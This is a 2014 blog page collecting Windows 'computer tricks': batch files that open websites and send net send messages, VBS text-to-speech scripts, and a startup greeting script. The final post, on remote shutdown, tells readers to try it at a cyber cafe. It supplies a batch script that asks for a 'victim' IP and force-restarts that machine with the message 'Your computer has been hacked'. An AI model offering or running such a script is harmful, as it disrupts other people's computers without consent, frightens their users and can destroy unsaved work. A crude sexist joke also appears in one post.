Showing posts with label Computer tricks. Show all posts
Showing posts with label Computer tricks. Show all posts

15/12/2014

How To Open Multiple Websites With double Click

How to Open Multiple Websites With double Click
Notepad is a common text-only editor. The resulting files—typically saved with the .txt extension—have no format tags or styles, making the program suitable for editing system files to use in a DOS environment and, occasionally, source code for later compilation or execution, usually through a command prompt. It is also useful for its negligible use of system resources; making for quick load time and processing time, especially on under-powered hardware. Notepad supports both left-to-right and right-to-left based languages. Unlike WordPad, Notepad does not treat new lines in Unix or Mac-style text files correctly. Notepad offers only the most basic text manipulation functions, such as finding text. Only newer versions of Windows include an updated version of Notepad with a search and replace function.
However, it has much less functionality in comparison to full-scale editors.

How to open multiple websites with double click in Notepad
1. Open Notepad.
2. Copy and Paste the below Code in Notepad without any error.

@echo off
start
http://deadlyuniversityspy.blogspot.com/
start
https://m.facebook.com/computers1
start
http://deadlyuniversityspy.blogspot.in/2014/11/how-to-connect-to-protected-wi-fi.html
start
http://deadlyuniversityspy.blogspot.in/2014/11/how-to-encrypt-your-wireless-network.html
start
https://m.facebook.com/groups/270993376312145
start
http://www.google.com/
3. Save Notepad file as Sites.bat you can save with any name but .bat extension is important and save on Desktop or save anywhere for your convenience.
4. Now just double click newly created file, you can see six websites will open at once.
Note:- You can add more sites by editing Sites.bat using Notepad.

27/11/2014

Chat with Friends through Command Prompt (cmd)

Talk with other computers on your network.

If you want a private chat with a friend or client on you Network, you don't need to download any fancy program! All you need is your friends IP address and Command Prompt.
1. Open notepad then type:
@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A
And then save as Messenger.bat and close the Notepad.
Read Also:-Shutdown Any Computer Remotely Using Command Prompt (CMD)
2. Go to control panel (make sure you are in Classic View) Click on administrative tools then click on services.
3. Now find the Messenger service in the list on the right, then open it. You'll see startup type which should be disabled, so click on that and select manual.
4. Now press the start button in the upper right hand corner of the window (not the green start button), and click apply.
5. Next, do the same procedure on the remote computer. Until this service is activated on that PC, or you won't be able to use this.
6. Now click on the messenger file you made. Since it is a batch file it will open with cmd (command prompt). It should show MESSENGER at the top and User: below that. Type the IP address of the remote computer after User:
After this, you should see this:
Message:
Now type in the message you wish to send.
Before you press Enter it should look like this:
MESSENGER
User: 56.108.104.102
Message: Hi
Now all you need to do is press Enter and start chatting.
Note: By default Microsoft disabled those features to further secure the system and among other things. net send is a command using a background service called messenger. This service is no longer working with Windows 8 nor in any latest OS versions.
Love this article?
Share it with your friends on Facebook

22/11/2014

Find your computer's Gender


My girlfriend (S. Pandey) always complains that I love my computer more than her. And I always reply, “Baby, its only a machine”. On that she often comments that if ever machines have gender my computer would be a girl. Turns out, she is right. Today, i decided to share this brilliant trick to let you know whether your computer is a male or a female?
There is a way you can find out your computer's gender. Simple follow the instructions below:
1. Open your notepad
2. Type or copy the codes written below:
paste:CreateObject(“SAPI.SpVoice”).Speak”baby I love you”
3. Save as computer_gender.vbs 4. Run the file.
Now, if you hear a male voice its a boy and if you hear a female voice, its a girl.
Note: Type above mentioned carefully otherwise, you hear nothing.
Don’t forget to tell me what is your computer, a boy, a girl or a bitch. Smiley
Honestly, mine is a girl.
Read Also:- Make your Computer Welcome You
Make your Computer Talk.
On a serious note, this depends upon the voice you have selected in Microsoft Text to Speech options.
Love this article?
Share it with your friends on Facebook

Make your Computer Talk


Intelligent machines capable of speech are often the stuff of futuristic sci-fi movies, but you can turn any computer into a chatty Cathy. Even though we aren’t yet at the stage with computers where they can interact with us like people, there are a few tools and simple scripts we can write to make any computer that is running Windows speak to us. Well, if you wish to know how to do this, then keep scrolling. With this trick, you can create a script in Windows which will make your computer speak whatever you input to it.
Read Also:- Make your Computer Welcome You
To create one such talk script, follow the steps given below:
Step 1. Open Notepad.
Step 1. Copy and paste the exact code given below.
Dim Message, Speak
Message=InputBox("Enter text","Speak")
Set
Speak=CreateObject("sapi.spvoice")
Speak.Speak Message
Step 3. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Speak.vbs or "*.vbs".
Step 4. Double click on the saved file, a window will open. Enter some text in enter text column and click OK.
Now your Computer will speak/talk what you typed in Step 4.

Windows Compatibility

This VBS file can be executed on all versions of Windows including Windows XP,Windows Vista, Windows 7 and Windows 8.
Personal Experience: I personally showed this trick to many of my friends at LUMS when i was doing Ph.D in mathematics and they were literally left awestruck. You too can impress your friends by making your PC talk and be the Computer Wiz.
Love this article?
Share it with your friends on Facebook

Make your Computer Welcome You


If you use to watch Hollywood Sci -Fi movies, you must saw a scene in which the computer welcomes the user by speaking his name in the computerized voice.This looks quite impressive, but You can easily make your Windows PC to speak a welcome greeting note for you at windows start up.This is very simple and easy to implement trick but when you start your computer in front of your friends or anybody, they will be wondered by listening your name.So If you want to impress your friends with your technical and programming skills,you must try this.This is very cool and interesting trick to impress someone. This article describes exactly how you can make your Computer welcome you in its computerized voice. You can make your Windows based computer say "Welcome to your PC, Username." (i make my computer "Welcome to your PC, Johnelwin").
Read Also:- Make your Computer Talk
Make Windows Greet you with a Custom Voice Message at Startup To use this trick, follow the instructions given below:
1. Click on Start. Navigate to All Programs, Accessories and Notepad.
2. Copy and paste the exact code given below.
Dim speaks, speech
speaks="Welcome to your PC,
Username"
Set
speech=CreateObject("sapi.spvoice")
speech.Speak speaks
3.Replace User name with your own name.
4. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Welcome.vbs
5. Copy the saved file.
6. Navigate to C:\Documents and Settings\All Users\Start Menu\Programs\Startup In Windows XP and to C:\Users\{User-Name}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup In Windows 8 , Windows 7 and Windows Vista if C: is your System drive. App Data is a hidden folder. So, you will need to select showing hidden folders in Folder options to locate it.
7. Paste the file. Now when the next time you start your computer, Windows will welcome you in its own computerized voice.
Note: For best results, it is recommended to change sound scheme to No Sounds. You can change the sound scheme to No Sounds by following the steps given below:
1. Go to Control Panel.
2. Then click on Switch to Classic View.
3. Then Click on Sounds and Audio Devices.
2. Then Click on the Sounds Tab.
5. Select No Sounds from the Sound Scheme option.
6. If you wish to save your Previous Sound Scheme, you can save it by clicking Yes in the popup menu.
7. Click on OK.
Try it yourself to see how it works. In my personal opinion, this is an excellent trick. Whenever I start my PC in front of anybody and the PC welcomes me, the fellow is left wondering how brilliant a computer do I have.
Love this article?
Share it with your friends on Facebook

19/02/2014

Shutdown Any Computer Remotely Using Command Prompt (CMD)


You may try this trick at any cyber cafe.
1. Open the command prompt. This may be done by clicking on the Start button and selecting Run.
2. Type cmd and press Enter.
3. Type shutdown -m\\computername,replacing"computername" with the name of the computer you wish to shutdown or the computer's IP address.
4. Experiment with the shutdown command's switches.
-r will force a restart, disabling any services or user interaction from interrupting it.
-c "comment" will force a comment to appear on the system being shutdown.
-t xx will force a timeout for "xx" seconds. For example, -t 60 would perform a shutdown after a 60-second timeout.
-a will abort the shutdown.
A full command example: shutdown -m\\myserver-r -c "This system will shutdown in 60 seconds" -t 60

ALTERNATIVE
1. Type shutdown -i in the run window.
2. Click the Add box and type the name of the computer you want to shutdown or its IP address. You can select what you want the computer to do.
3. In this mode, it's necessary to add a comment. Do so. Press OK.

INTERESTED IN .BAT FILES
1. Open Notepad and type:
@echo off echo.
set /p vic=Enter the IP of your victim:
shutdown -m \\%vic% -r -c "Your computer has been hacked. Shutdown in 20 seconds" -t 60
echo Victim Hacked....
pause
exit
2. Save it as anything.bat.
3. When you run it, it'll ask for your victim's IP. Enter it and you are done.
Love this article?
Share it with your friends on Facebook